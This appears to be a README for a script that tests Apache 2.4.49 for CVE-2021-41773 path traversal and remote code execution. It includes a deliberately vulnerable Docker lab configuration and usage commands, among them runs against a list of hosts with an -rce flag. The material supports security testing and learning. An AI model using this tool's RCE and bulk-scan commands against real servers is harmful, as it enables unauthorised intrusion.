cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49. Vulnerable instance of Docker is provided to get your hands dirty on CVE-2021-41773
If CGI-BIN is enabled than, we can perform Remote Code Execution but not Path Traversal, so "icons" directory has been added under Alias section in httpd.conf for checking Path Traversal vulnerability.
1. Enable CGI-BIN
2. Add "icons" directory in Alias section
3. <Directory>Require all granted</Directory>
$ docker build -t cve-2021-41773 .
$ docker run -it cve-2021-41773
$ python3 cve-2021-41773.py -u http://172.17.0.2
$ python3 cve-2021-41773.py -u http://172.17.0.2 -pt
$ python3 cve-2021-41773.py -u http://172.17.0.2 -rce
$ python3 cve-2021-41773.py -l list.txt
$ python3 cve-2021-41773.py -l list.txt -pt
$ python3 cve-2021-41773.py -l list.txt -rce
More information can be found here.